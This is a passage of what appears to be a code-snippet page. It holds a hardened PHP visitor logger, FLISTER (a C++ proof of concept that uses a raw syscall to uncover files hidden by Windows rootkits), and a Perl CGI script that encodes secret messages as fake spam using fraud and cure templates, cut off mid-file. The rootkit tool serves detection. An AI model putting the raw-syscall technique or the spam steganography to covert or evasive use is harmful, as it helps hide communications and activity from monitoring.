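// Added example, not the tutorial author's code. LOG_FILE and log_visitor()
// are assumed names; put the log in a directory that is NOT served over HTTP
// and is writable only by the web server account.
const LOG_FILE = '/var/log/mysite/visitors.log'; // hypothetical path

function log_visitor(array $server, string $logFile): bool
{
    // REMOTE_ADDR comes from the TCP connection, but validate it anyway so
    // that only a well-formed address is ever written. Client-supplied
    // headers such as X-Forwarded-For are deliberately ignored.
    $ip = filter_var($server['REMOTE_ADDR'] ?? '', FILTER_VALIDATE_IP);
    if ($ip === false) {
        return false;
    }

    // Create the file as 0640 (owner read/write, group read) instead of
    // the world-writable 0666 from step 4.
    if (!file_exists($logFile)) {
        $old = umask(0027);
        $created = touch($logFile);
        umask($old);
        if (!$created) {
            return false;
        }
    }

    // One timestamped record per line; LOCK_EX stops concurrent requests
    // from interleaving partial lines.
    $line = gmdate('Y-m-d\TH:i:s\Z') . ' ' . $ip . "\n";
    return file_put_contents($logFile, $line, FILE_APPEND | LOCK_EX) !== false;
}

log_visitor($_SERVER, LOG_FILE);
```

Include it exactly as in step 5, and read the log over SSH or through an authenticated admin page rather than a public URL.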

FLISTER – uncovering files hidden by Windows rootkits

March 3, 2007

/*
simple proof-of-concept
uncovers files hidden by various rootkits ;)
joanna at invisiblethings.org

http://invisiblethings.org

This is a .CPP FILE
*/

#include <windows.h>
#include <stdio.h>

typedef ULONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK {
union {
NTSTATUS Status;
PVOID Pointer;
};

ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef
VOID
(NTAPI *PIO_APC_ROUTINE) (
IN PVOID ApcContext,
IN PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG Reserved
);

typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR  Buffer;
} UNICODE_STRING;

typedef UNICODE_STRING *PUNICODE_STRING;

typedef const UNICODE_STRING *PCUNICODE_STRING;

#define NTAPI __stdcall

#define IN
#define OUT
#define OPTIONAL

typedef enum _FILE_INFORMATION_CLASS {
FileDirectoryInformation = 1,
FileNamesInformation = 12

//...
} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;

typedef struct _FILE_DIRECTORY_INFORMATION {
ULONG    NextEntryOffset;
ULONG    Unknown;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_DIRECTORY_INFORMATION,
*PFILE_DIRECTORY_INFORMATION;

typedef struct _FILE_NAMES_INFORMATION {
ULONG    NextEntryOffset;
ULONG    Unknown;
ULONG FileNameLength;
WCHAR FileName[1024];
} FILE_NAMES_INFORMATION,
*PFILE_NAMES_INFORMATION;

int ZwQueryDirFileNo = 0;

void usage (char *str) {
printf ("FLISTER 0.1, (c) 2005 by joanna\n");
printf ("http://invisiblethings.org\n");
printf ("%s <dir> [ZwQueryDirFile_Syscall_Index]\n", str);
exit (0);

}

_declspec(naked)
NTSTATUS NTAPI PrivQueryDirectoryFile (
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID AppContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInfo,
IN ULONG FileInfoLen,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN ReturnSingleEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN BOOLEAN RestartScan
) {
_asm {
mov eax, ZwQueryDirFileNo
lea edx, [esp+4]
int 2Eh
ret 2Ch
}
}

typedef NTSTATUS (NTAPI *ZWQUERYDIRFUNC) (
HANDLE,
HANDLE,
PIO_APC_ROUTINE,
PVOID,
PIO_STATUS_BLOCK,
PVOID,
ULONG,
FILE_INFORMATION_CLASS,
BOOLEAN,
PUNICODE_STRING,
BOOLEAN);

ZWQUERYDIRFUNC ZwQueryDirectoryFile;

int main (int argc, char **argv) {
if (argc != 2 && argc != 3) usage(argv[0]);
HANDLE hDir = CreateFile (
argv[1],
FILE_LIST_DIRECTORY,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_FLAG_BACKUP_SEMANTICS,
NULL);

if (hDir == INVALID_HANDLE_VALUE) {
printf ("Can't open directory\n");
exit (1);
}

if (argc == 2) {

HMODULE hNTDLL = LoadLibrary ("ntdll");
ZwQueryDirectoryFile = (ZWQUERYDIRFUNC)
GetProcAddress (hNTDLL, "ZwQueryDirectoryFile");
printf ("ZwQueryDirFile at addr %#x\n", (DWORD)ZwQueryDirectoryFile);
//    ZwQueryDirFileNo = *(DWORD*)((char*)addr + 1);
} else {
ZwQueryDirFileNo = strtoul(argv[2], 0, 0);
printf ("Using function from SysCallTable[%d]...\n",
ZwQueryDirFileNo);
ZwQueryDirectoryFile = PrivQueryDirectoryFile;
}

printf ("directory dump:\n---------------------------\n");

IO_STATUS_BLOCK stat;
FILE_NAMES_INFORMATION fileInfo;

while (1) {

memset (&fileInfo, 0, sizeof (fileInfo));
memset (&stat, 0, sizeof (stat));

NTSTATUS s = ZwQueryDirectoryFile (
hDir,
0,
0,
0,
&stat,
&fileInfo,
sizeof (fileInfo),
FileNamesInformation,
TRUE,
NULL,
FALSE);

if (s == 0x80000006) break;
if (s != 0) {
printf ("error while scanning directory (err = %#x)\n", s);
exit (2);
}

WCHAR *wfname = new WCHAR [fileInfo.FileNameLength/2 + 1];
memcpy (wfname, fileInfo.FileName, fileInfo.FileNameLength);
wfname [fileInfo.FileNameLength/2] = 0;
printf ("%S\n", wfname);
delete[] wfname;	// allocated with new[], so release with delete[]

}

CloseHandle (hDir);
return 0;
}

CyberArmy Spam Steganograph

March 3, 2007

#!/usr/local/bin/perl
#
################################
# CyberArmy Spam Steganography #
################################
#
# Mimic.pl:
#
#    This uses steganography to encode a message into spam.  Rather like
# the scripts put up by spammimic.com and others, even if this uses another
# algorithm.  The workings of &encode and &decode are discussed in their
# comments below, but this is the message format used:
#
#    [GREETING][BEGIN][DATA][END][CLOSING]
#
#    Each spam has a greeting and closing made specifically for that genre
# of spam, whether the spam is credit fraud, phoney cures or MMF.  It also
# picks one of 3 pairs of begin and end lines.  On each line of spam, \n's are
# replaced with a token [ESC - 33] so they don't mistakenly get encoded as
# two characters, while the lines of spam themselves are randomly punctuated by
# &addpunct to add variety.  It also formats the spam into paragraphs of 4-8
# lines so it looks much more natural, while it turns tabs into spaces and also
# specially encodes spaces by doubling the punctuation [eg. '.' -> '..' and so
# on]  In the mean time, each character is run through &munge which implements
# a simple series of transliterations to keep repeated lines to a minimum.
#
#
# Credits:
#
#    (c) 2001 Xenographic of the CyberArmy [www.cyberarmy.com]
#    Released under the BSD license for unrestricted free use.
#    This notice is all that must remain unchanged.
#
#    Spammimic.Com
#        They came up with the idea & this is a copy of it.
#
#    News.Admin.Net-Abuse.Sightings [NANAS]
#        I got the spam from there, using groups.google.com.
#
#    O’Reilly Publishing
#        Their books are the best; I also use some boilerplate code from
#        them.
#
#    DAL Net #perl [http://www.dalnet-perl.org]
#        Helped me clean up a few bugs that crept in.
#
#    51 of http://www.cyberarmy.com
#        He suggested some improvements to the coding style.
#

INIT {    # Make sure other INIT blocks see all this.
$corrupt = 0;        # Flag if the data has been corrupted somehow.
$fakeNL = v33;        # Pretend \n is ESC internally.
$tab = " " x 5;        # So we can change tabs to spaces.
$verbose = 1;        # Turns on verbose error messages.
$debug_info = "";    # Holds verbose error messages.
}

&output_header;         # Prints the page’s header.

# Give them a form to enter data if they just got here.
my %data = getDATA() or &ourFORM;
my $input = $data{"MESSAGE"} or &ourFORM("You forgot to enter a message!");
$action = $data{"ACTION"};    # Remember for later.

# Decide which action to do.
if ($action eq "DECODE") {
&decode($input);
} else {
&encode($input);
}

&ourFORM("You forgot to tell me what to do with that data!");
exit;    # Explicit.

#################
# output_header #
#################
#
# Outputs the HTML header.
#

sub output_header {

print "Content-type: text/html\n\n";    # Tell browser what this data is.
$| = 1;                    # Turn off buffering.

print <<'ENDHTML';

<HTML><HEAD>
<TITLE> Spam Steganography </TITLE>
<STYLE TYPE="text/css">
<!--
A:hover   {
color: #C0C0C0;
background: white;
text-decoration:underline;
}
H1, H2, H3 {
margin-left: 0%;
color: #FFAA33;
font-family: arial, verdana, helvetica, sans-serif;
}
-->
</STYLE>
</HEAD>

<BODY BGCOLOR=#263C6D TEXT="white" LINK="#FFFFFF" VLINK="#C0C0C0" ALINK="#C0C0C0">

<H1>Spam Steganography</H1>

This utility is our own rip-off of the
<A href="http://www.spammimic.com/">Spam Mimic</A>. It's improved in
some ways, even if it may sound really idiotic (doesn’t all spam?) and
it doesn’t allow accents.  Don’t put any long messages in there, since
it becomes *VERY* long the more you put into it. Still, it’s one more
thing for email snoops to worry about :] <BR><BR>

-Xenographic <BR><BR>

ENDHTML

}

###########
# getDATA #
###########
#
# Gets the data sent to the script.
#
# Ripped from boilerplate code on p. 81 of O’Reilly’s
# “CGI Programming with Perl.”
#

sub getDATA {

my %form_data;
my $name_value;
my @name_value_pairs = split /&/, $ENV{QUERY_STRING};

if ($ENV{REQUEST_METHOD} eq 'POST') {
my $query = "";
read ( STDIN, $query, $ENV{CONTENT_LENGTH} ) == $ENV{CONTENT_LENGTH}
or return undef;
push @name_value_pairs, split /&/, $query;
}

foreach $name_value (@name_value_pairs) {
my($name, $value) = split /=/, $name_value;

$name =~ tr/+/ /;
$name =~ s/%([\da-f][\da-f])/chr(hex($1))/egi;

$value = "" unless defined $value;
$value =~ tr/+/ /;
$value =~ s/%([\da-f][\da-f])/chr(hex($1))/egi;

$form_data{$name} = $value;
}

return %form_data;
}

###########
# escHTML #
###########
#
# This does a bit more than escapeHTML in cgi.pm would, namely it encodes
# whitespace properly for our uses here.
#

sub escHTML {
my ($info) = @_;    # Get HTML
return undef unless defined($info);

$info =~ s/&/&amp;/g;        # Escape chars into proper HTML.
$info =~ s/</&lt;/g;
$info =~ s/>/&gt;/g;
$info =~ s/\"/&quot;/g;

$info =~ s/\t/$tab/g;        # Change tabs to spaces.
$info =~ s/$fakeNL/<BR>/og;    # Decode hidden \n’s.
$info =~ s/\n/<BR>/g;        # Decode non-hidden \n’s.
1 while $info =~ s/  /&nbsp; /g;# Some spaces cannot be
# &nbsp;’s or it becomes one
# long line.  This allows it
# to show all spaces & work.

return $info;
}

###########
# ourFORM #
###########
#
# Writes out the HTML form used and the footer, as well as any messages. By the
# time you get here, there is no time to do anything else, since you’ll output
# the </HTML> tag.
#

sub ourFORM {

my ($info) = @_;
$info = escHTML($info);

print <<EHTML;

<FORM METHOD=POST>
<TABLE BORDER=0>

<TR VALIGN=TOP>
<TD ALIGN=LEFT>Message:</TD>
</TR>
<TR>
<TD ALIGN=LEFT COLSPAN=3>
<TEXTAREA NAME="MESSAGE" ROWS=5 COLS=60></TEXTAREA></TD>
</TR>

<TR VALIGN=TOP>
<TD ALIGN=LEFT VALIGN=CENTER>
<INPUT CHECKED TYPE=RADIO NAME=ACTION VALUE="ENCODE"> Encode </TD>
<TD ALIGN=CENTER VALIGN=CENTER>
<INPUT TYPE=RADIO NAME=ACTION VALUE="DECODE"> Decode </TD>
<TD ALIGN=RIGHT><INPUT TYPE=SUBMIT VALUE="Submit"> </TD>
</TR>

</TABLE>
</FORM>

EHTML

unless ($corrupt == 0) { # Print a notice that something went wrong.
print qq!
<B>The program says that some data was lost or incorrect.
Double check it before use.!;
print "<BR> ERROR: $debug_info " if $verbose;
if ($action eq "DECODE") {
print qq! <BR>[?'s may indicate corrupted data]!;
}

print qq!</B><BR><BR>!;
}

if ($action eq "ENCODE") {
# Print the notice that they just encoded something.
print qq!Your message becomes the spam: <BR><BR>!;
}

if ($action eq "DECODE") {
# Print the notice that they just decoded something.
print qq!The secret message in that spam is: <BR><BR>!;
# Make sure they get *some* feedback.
$info = "[ERROR: NO DATA]" unless defined $info;
}

if (defined $info) {
# Don't print anything when there's no message to be given.
print <<"EINFO";
<TABLE WIDTH="100%" BORDER=1>
<TR><TD>$info</TD></TR>
</TABLE>
EINFO
}

# Put your page footer in here.
print <<"FOOTER";
</BODY> </HTML>
FOOTER

exit;    # Done, there's nothing left to do now...
}

##########
# encode #
##########
#
# Turns a message into spam.  It picks a genre of spam, selects one of the pairs
# of greetings and endings (greetings are 2 lines, the last sentence is only one
# line, that's why it looks odd below with the 1,3,5 array indexes).  It then
# goes through each character & encodes it as a line of spam.  It also punctuates
# each line with a random ! or . [which is why the data section cannot have any
# lines with !'s or .'s in them].  When it encodes a space, it just adds another
# punctuation mark [whichever one it last used, to make it .. for 1 space, ...
# for 2, etc.] Finally, it adds a "pad" to the end appropriate to the genre and
# prints it out for you.  We hide \n's as ESC [33] internally, since they seem
# to get confused otherwise.
#

sub encode {

my ($message) = @_;     # Get message to encode.
my $badchars = $message; # Save a copy to find the bad chars in it.
$encoded = "";         # Place to put the message as it's encoded.

# Replace everything except chars we understand with ?'s.
# Be *very* careful when changing these...
if ($message =~ tr[-^a-zA-Z0-9_ \t\n\r\f\\/:;",.?+~'<>{=}()!@#$%&*][?]c) {

# This had something more…
$corrupt = 1;        # Uh oh, it had bad chars in it.

# Use the same regex as above, w/o the ^ negation and substitute the
# null string instead to be left with what was NOT understood.
$badchars =~ tr[-^a-zA-Z0-9_ \t\n\r\f\\/:;",.?+~'<>{=}()!@#$%&*][]d;

# Remove dupes in $badchars.
$badchars =~ tr[-^a-zA-Z0-9_ \t\n\r\f\\/:;",.?+~'<>{=}()!@#$%&*][]cs;

$badchars = &escHTML($badchars);    # So they show up in HTML.
$debug_info .= " Found the illegal char(s) [$badchars] when encoding them. " if $verbose;
}

$message =~ s/\t/$tab/ego;        # Interpret tabs.
$message =~ s/[\r]?\n/$fakeNL/eg;    # Hide \n’s from the encoder.
$message =~ s/\f/$fakeNL/eg;        # Just because… :]

$genre = 1 + int rand(3);        # Choose a random spam genre.
$endgrt = (int rand(3));        # Random ending.
$greet = $endgrt * 2;            # Greeting to go with ending above.

if ($genre == 1) {    # Load data on business spam.
&get_spamtype("business");
$encoded .= ($bus_start[$greet] . "\n\n" . $bus_start[$greet + 1]);
$end = $bus_end[$endgrt];
}

if ($genre == 2) {    # Load data on credit spam.
&get_spamtype("credit");
$encoded .= ($cre_start[$greet] . "\n\n" . $cre_start[$greet + 1]);
$end = $cre_end[$endgrt];
}

if ($genre == 3) {    # Load data on miracle cure spam.
&get_spamtype("cures");
$encoded .= ($cur_start[$greet] . "\n\n" . $cur_start[$greet + 1]);
$end = $cur_end[$endgrt];
}

@arrmsg = split //, $message;

foreach $char (@arrmsg) {

if ($char eq " ") {        # Spaces become punctuation
&addpunct("last");    # Add more punctuation to encode
# a space [eg. '.' -> '..']
} else {
&addpunct;        # &addpunct gets sneaky here in
# how it adds things, it makes
# sure that it wasn't intending
# to start a new paragraph, as
# it does sometimes.

$char = &munge($char);    # Make the spam less repetitive.

if (defined $tospam[$getindx{$char}]) {    # Writes out a line of spam.
my $curpunct = &peekpunct;     # Find punctuation to use.
$encoded .= " " . $tospam[$getindx{$char}] . $curpunct;

} else {        # Warn about unencodeable chars.
$corrupt = 1;        # Same flag that &ourFORM checks.
$char = &escHTML($char);
$debug_info .= " Didn't know how to encode [ $char ] " if $verbose;
}
}
}

$encoded .= (" \n\n" . $end . " " . $pad);    # Write out appropriate ending.
&ourFORM($encoded);                # Print out the spam.
exit;    # Explicit.
}

##########
# decode #
##########
#
# Turns a message back to normal.  It first checks to see which beginning tag you used.  If it
# doesn’t find any of them, it reports an error.  Otherwise, it strips off everything between
# the beginning tag it found and the ending tag that goes with that [it reports an error if it
# cannot find the end tag, but valiantly attempts to decode what it can, first].  From the tags
# it finds, it deduces the proper genre and loads the info for that sort of spam.  It then splits
# the spam on the line delimiters (! and .) and matches each line against all possible letters.
# If the line is blank, it knows that it hit a .. or !! or something, which encodes a space, so
# it adds them in there, as appropriate and changes all unknown lines to ?’s.
#

sub decode {

my ($message) = @_;
$message = &validate_spam($message);
@spltmsg = split /[.!]/, $message;
$decoded = "";

for (@spltmsg) {    # Remove extra whitespace so it doesn't hinder matches.
s/^\s+//;
s/\s+$//;
}

TRANS: foreach $line (@spltmsg) {

if ($line =~ /^[\s]?$/o) {    # Decode spaces, which become
# blank lines after the split
$decoded .= " ";    # since they were extra
# punctuation (.!) before.
next TRANS;
}

for (my $i = $[; $i < $#tospam; ++$i) { # Just in case you changed $[
# Figure out what symbol it is supposed to be.
if ($line eq $tospam[$i]) {
$decoded .= munge($indx[$i]); # Descramble it.
next TRANS;
}
}

$line = &escHTML($line);
$debug_info .= " Didn't understand [ $line ] in spammish. " if $verbose;
$decoded .= "?";    # Corrupted data :[
$corrupt = 1;        # Same flag that &ourFORM checks.
}

&ourFORM($decoded);
exit;    # Explicit.
}

#################
# validate_spam #
#################
#
# Figure out if it's one of our spams.  It looks for beginning and ending tags [if they're not
# found, it reports an error] and strips out everything between those tags.  It then figures
# out the genre of spam it just matched and loads the info for that type of spam and goes back
# to &decode which actually decodes the spam.
#

sub validate_spam {

my ($message) = @_;
$message =~ s/[\n\r]/ /g;    # Collapse it into one long line.
$message =~ s/\s+/ /g;        # Remove extra whitespace which may have snuck in.

# Now see if this is one of *our* spams.  Spam
# headers are 2 lines, here I only care about
# every 2nd line, which is at 1, 3 & 5 in the
# array.  I hope you guys aren’t using $[ but
# if you are this works, since I check against
# $[ - 1 rather than just -1.

FIND: {
my $pos;
for (my $i = 1; $i < 6; $i += 2) {

$pos = index($message, $bus_start[$i]);
if ($pos != ($[ - 1)) {                # If it matched...
&get_spamtype("business");        # Load data on the business genre.
$pos += length($bus_start[$i]);        # Move to the end of the start tag.
$message = substr($message, $pos);    # Grab everything after the start tag.
$i = int ($i - 1) / 2;            # Correct $i, since the arrays are goofy.
$pos = index($message, $bus_end[$i]);    # Find the end of the data.
if ($pos == ($[ - 1)) {            # If it failed...
$corrupt = 1;            # Warn about missing/corrupted data.
$debug_info .= " No ending tag found. " if $verbose;
} else {
$message = substr($message, 0, $pos);    # Strip off the ending tag and anything after it.
}
last FIND;    # Go translate it now.
}

$pos = index($message, $cre_start[$i]);
if ($pos != ($[ - 1)) {                # If it matched...
&get_spamtype("credit");        # Load data on the credit genre.
$pos += length($cre_start[$i]);        # Move to the end of the start tag.
$message = substr($message, $pos);    # Grab everything after the start tag.
$i = int ($i - 1) / 2;            # Correct $i, since the arrays are goofy.
$pos = index($message, $cre_end[$i]);    # Find the end of the data.
if ($pos == ($[ - 1)) {            # If it failed...
$corrupt = 1;            # Warn about missing/corrupted data.
$debug_info .= " No ending tag found. " if $verbose;
} else {
$message = substr($message, 0, $pos);    # Strip off the ending tag and anything after it.
}
last FIND;    # Go translate it now.
}

$pos = index($message, $cur_start[$i]);
if ($pos != ($[ - 1)) {                # If it matched...
&get_spamtype("cures");            # Load data on the miracle cure genre.
$pos += length($cur_start[$i]);        # Move to the end of the start tag.
$message = substr($message, $pos);    # Grab everything after the start tag.
$i = int ($i - 1) / 2;            # Correct $i, since the arrays are goofy.
$pos = index($message, $cur_end[$i]);    # Find the end of the data.
if ($pos == ($[ - 1)) {            # If it failed...
$corrupted = 1;        # Warn about missing/corrupted data.
$debug_info .= " No ending tag found. " if $verbose;
} else {
$message = substr($message, 0, $pos);    # Strip off the ending tag and anything after it.
}
last FIND;    # Go translate it now.
}

}

# This isn't one of our spams.
&ourFORM("Sorry, that spam doesn't contain any hidden messages!");
exit;    # Explicit.

}; # Go on to translate the spam.

return $message;

}

############
# addpunct #
############
#
# This function generates random !'s and .'s to punctuate the spam and to encode
# spaces (they are encoded as one extra punctuation mark in the spam for each
# space encoded, eg. ! -> !! for one space). It also adds newlines every so often
# to form simulated paragraphs about every 4-8 lines of spam, so it doesn't look
# like one big, long & ugly block of gibberish.  It operates on the assumption that
# $encoded is both visible to it and holds the text to be encoded.
#

{    # This block holds some variables for &addpunct so they aren't exposed.

my $punctcount;
my $curpunct;
my $nextp;
my $choice;
my $first_time;

INIT {
$punctcount = 0;        # How many punctuation marks to output.
$curpunct = '!';        # Current punctuation.
$nextp = 4 + int rand(5);    # When to start the next paragraph.
$choice = 1 + int rand(3);    # The next punctuation to choose ('.' twice or '!')
$first_time = 1;        # Don't add the extra space the first time.
}

sub peekpunct {
return $curpunct;
}

sub addpunct {

my $mode = shift;

if ($mode) {    # They want what they had last time.
# No need to check if it's equal to "last" since it's
# undef the rest of the time.

if ($punctcount) {
# Add punctuation unless a new paragraph is starting.
++$punctcount;
} else {
$encoded .= $curpunct unless $first_time;
$first_time = 0;
}
return;
}

# They want some new punctuation...

if ($punctcount) {        # Start new paragraphs neatly.
$encoded .= ($curpunct x ($punctcount - 1)) . "\n\n";
$punctcount = 0;    # Sub 1 because this miscounts.
}

$choice = 1 + int rand(3);    # Choose the next punctuation.

if ($choice == 3) {
$curpunct = "!";
} else {
$curpunct = ".";
}

if (--$nextp == 0) {        # Decide when to start new paragraphs.
++$punctcount;
$nextp = 4 + int rand(5);
}

return;
}
}

#########
# munge #
#########
#
# This function scrambles the data a little so that the spam isn't quite as
# repetitive and may be slightly harder to decode.  Note that ALL routines must
# be SYMMETRIC.  This means that if c -> q then q -> c and that the transform of
# an uppercase letter is the same as the one for its lowercase letter (q -> c and
# Q -> C).  If you change that, the input will not match the output and you will
# wind up with garbage :]  This should give the spam a period of about one
# paragraph before repeating on average, unless you're unlucky and it transforms
# just so.  It's not like this will stop the NSA from decrypting this; it just
# makes it look nastier, I think.  You should not munge spaces -- they're taken
# care of separately in the encoding scheme.
#

{
# This block contains some of the initialization code for &munge
# It just helps it keep track of local variables and such while
# scrambling the data to make the same sentences repeat less often.
# It is here to keep this info private.

my $seed;    # The seed for the munger.
my $oldseed;    # The last seed used.
my $maxseed;    # This is how many munges there are below, make
# sure it's right by reading &munge below.
my $ch;        # The character we're munging in &munge.

INIT {        # Initializes some variables for these routines.

$seed = 0;
$oldseed = 0;
$maxseed = 7;
$ch = "";
}

sub getseed {    # This advances the seed making sure it gets reset.

$oldseed = $seed;

if ($seed == $maxseed) { # Reset seed.
$seed = 0;
} else {         # Advance seed.
++$seed;
}

return $oldseed;    # They want the *old* value.
}

sub charuc {    # Swap case on an uppercase char half the time.

my $ch = shift;
$ch = lc $ch if (($seed % 2) == 1);
return $ch;
}

sub charlc {    # Swap case on a lowercase char half the time.

my $ch = shift;
$ch = uc $ch if (($seed % 2) == 1);
return $ch;
}
}

sub munge {    # Here is where we actually munge each character.

my $ch = shift;
my $seed = &getseed;

if ($ch =~ /^[a-z]$/o) {

# Do you like those tr///s?  It's one way of enforcing the BSD license as those are
# a /pain/ to mess with :]  -xeno

LWRTRANS: {            # Transform lowercase letters.

if ($seed == 0) {    # Transform 0
$ch =~ tr/xenoaisrhldcuqzvtjkbywgpfm/qzvtjkbywgpfmxenoaisrhldcu/;
last LWRTRANS;
}

if ($seed == 1) {    # Transform 1
$ch =~ tr/xenoaisrhldcukvtmzqbjfywpg/kvtmzqbjfywpgxenoaisrhldcu/;
last LWRTRANS;
}

if ($seed == 2) {    # Transform 2
$ch =~ tr/xenotaizqjkvsfbyrchpdgwmlu/fbyrchpdgwmluxenotaizqjkvs/;
last LWRTRANS;
}

if ($seed == 3) {    # Transform 3
$ch =~ tr/xenoaibywldcuvktzprsqghjfm/vktzprsqghjfmxenoaibywldcu/;
last LWRTRANS;
}

if ($seed == 4) {    # Transform 4
$ch =~ tr/xenoshdcuzqkvglrjayibtmwfp/glrjayibtmwfpxenoshdcuzqkv/;
last LWRTRANS;
}

if ($seed == 5) {    # Transform 5
$ch =~ tr/xenotasywgpfmirlvjbkzhqcdu/irlvjbkzhqcduxenotasywgpfm/;
last LWRTRANS;
}

if ($seed == 6) {    # Transform 6
$ch =~ tr/xenozjisrgpfmtqlwcdkaubhyv/tqlwcdkaubhyvxenozjisrgpfm/;
last LWRTRANS;
}

if ($seed == 7) {    # Transform 7 - $maxseed should equal this (7).
$ch =~ tr/xenojtkbrwlcmphizadyvqsufg/phizadyvqsufgxenojtkbrwlcm/;
last LWRTRANS;
}

# We should not get here, check below & make sure the seed gets reset
# after going through the last transform above.

warn "Bad seed value $seed found in swapcaps routine.";

}

$ch = &charlc($ch);    # Swap case half the time.
return $ch;

} elsif ($ch =~ /^[A-Z]$/o) {

UPRTRANS: {            # Transform uppercase characters.

if ($seed == 0) {    # Transform 0
$ch =~ tr/XENOAISRHLDCUQZVTJKBYWGPFM/QZVTJKBYWGPFMXENOAISRHLDCU/;
last UPRTRANS;
}

if ($seed == 1) {    # Transform 1
$ch =~ tr/XENOAISRHLDCUKVTMZQBJFYWPG/KVTMZQBJFYWPGXENOAISRHLDCU/;
last UPRTRANS;
}

if ($seed == 2) {    # Transform 2
$ch =~ tr/XENOTAIZQJKVSFBYRCHPDGWMLU/FBYRCHPDGWMLUXENOTAIZQJKVS/;
last UPRTRANS;
}

if ($seed == 3) {    # Transform 3
$ch =~ tr/XENOAIBYWLDCUVKTZPRSQGHJFM/VKTZPRSQGHJFMXENOAIBYWLDCU/;
last UPRTRANS;
}

if ($seed == 4) {    # Transform 4
$ch =~ tr/XENOSHDCUZQKVGLRJAYIBTMWFP/GLRJAYIBTMWFPXENOSHDCUZQKV/;
last UPRTRANS;
}

if ($seed == 5) {    # Transform 5
$ch =~ tr/XENOTASYWGPFMIRLVJBKZHQCDU/IRLVJBKZHQCDUXENOTASYWGPFM/;
last UPRTRANS;
}

if ($seed == 6) {    # Transform 6
$ch =~ tr/XENOZJISRGPFMTQLWCDKAUBHYV/TQLWCDKAUBHYVXENOZJISRGPFM/;
last UPRTRANS;
}

if ($seed == 7) {    # Transform 7 - $maxseed should equal this (7).
$ch =~ tr/XENOJTKBRWLCMPHIZADYVQSUFG/PHIZADYVQSUFGXENOJTKBRWLCM/;
last UPRTRANS;
}

# If this triggers, you need to check below to ensure that the seed is
# being reset after going through all transforms above.

warn "Bad seed value $seed found in swapcaps routine.";

}

$ch = charuc($ch);    # Switch case half the time.
return $ch;

} else {    # Mess with some of the common punctuation & numbers so they're
# even less obvious :]

if (($seed % 2) == 1) {    # Be careful that these stay *symmetric* :]
$ch =~ tr/01234567?!@.$9)8#^(&%*/.$9)8#^(&%*01234567?!@/;
# Ugly, huh? :]  Don't even try changing that...

} else {
$ch =~ tr/12345678@&^?).*%!#9$(0/?).*%!#9$(012345678@&^/;
# It may look like a core dump, but it's not...
}
return $ch;
}
}

################
# get_spamtype #
################
#
# Get the info on the genre of spam we have to translate.
# Parts in the data section (@tospam) CANNOT contain
# periods (.) or exclamation marks (!) or it will encode
# extra spaces which don't belong there or make the data
# unreadable.  Whitespace is also stripped & collapsed to
# make matches easier, since it is often changed in
# transmission.
#

sub get_spamtype {

$needs = $_[0];

INIT {    # This is always used, so we might as well load it right away.
# The number of chars here *must* correspond to the number of
# lines in EACH @tospam below, or things won't work right.
# Be *really* careful when changing it...

@indx = qw[a b c d e f g h i j k l m n o p q r s t u v w x y z
1 2 3 4 5 6 7 8 9 0 ( ) { } < > \ / - + * = ~ ^ $ @
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
; : . & ? ! ' " _ %];

push @indx, '#', ',', $fakeNL;        # So qw// won't whine.

%getindx = ();                # Just so Perl doesn't whine.
for ($i = $[; $i <= $#indx; ++$i) {    # Build a reverse lookup of @indx so I
$getindx{$indx[$i]} = $i;    # can find the position of any element.
}

# These are the delimiters of the spams, change them if you like, but make
# sure that you don't add or remove any lines or it won't work.  It's best
# if the start blocks end with a ! or ? since the script adds a ! for the
# punctuation if a space is the first character of the message to encode.
# [?! or !! look better than .! :]

@bus_start = <<'EB' =~ m/(\S.*\S)/og;
Dear E-Entrepreneur;
With all the money-making opportunities on the net why aren't you a millionaire yet?
Dear E-Business Owner,
You could be a millionaire! Can you accept this in your life?
Dear Internet Professional -
You were referred to me as someone who was ready for a Financial Breakthrough!
EB

@bus_end = <<'EBE' =~ m/(\S.*\S)/og;
TO BE INCLUDED IN FUTURE MAILINGS, PLEASE VISIT OUR WEBSITE!
Call 1-530-343-9681 to place your credit card order TODAY!
$$$ FINALLY YOU CAN MAKE SOME DREAMS COME TRUE! $$$
EBE

@cre_start = <<'ECR' =~ m/(\S.*\S)/og;
Dear Businessperson:
As a technical person and a natural skeptic my initial impulse was to ignore things like this, but NO MORE!
Dear E-commerce Consultant,
Have you been dissappointed by other credit card solutions which turned out to be scams?
Dear Professional:
Give yourself the ADVANTAGE of enjoying life more with EXCELLENT CREDIT!
ECR

@cre_end = <<'ECRE' =~ m/(\S.*\S)/og;
$$$ ENJOY YOUR NEWFOUND FINANCIAL FREEDOM $$$
CALL 1 (307) 587-9409 TO ORDER TODAY!
To Order By Phone, please call (206) 219-3312 NOW!
ECRE

@cur_start = <<'ECU' =~ m/(\S.*\S)/og;
Dear Herbal Enthusiest;
Did you know that you can order your herbs online from Mexico at a FRACTION of the cost?
Dear Friend -
Our ALL NATURAL 100% organic herbal supplements can help you feel at your peak again!
Dear Truth seeker,
Have you been misinformed about the nearly miraculous effectiveness of modern herbal remedies?
ECU

@cur_end = <<'ECUE' =~ m/(\S.*\S)/og;
!!! ORDER ONLINE NOW BEFORE THE MEXICAN GOVERNMENT SHUTS US DOWN !!!
Order now, you won't regret trying our ULTRA-HIGH QUALITY herbs!
VISIT US TODAY TO DISCOVER ALL THE THINGS *THEY* DON'T WANT YOU TO KNOW!
ECUE

}    # End of preloaded spam header data block.

if ($needs eq "business") {
$pad = qq'

Apex
Attn: R. Colbert
MailRoom Post Office Box  #0215
Coral Springs, FL 33067-0215

ORDER YOUR REPORTS TODAY AND GET STARTED ON
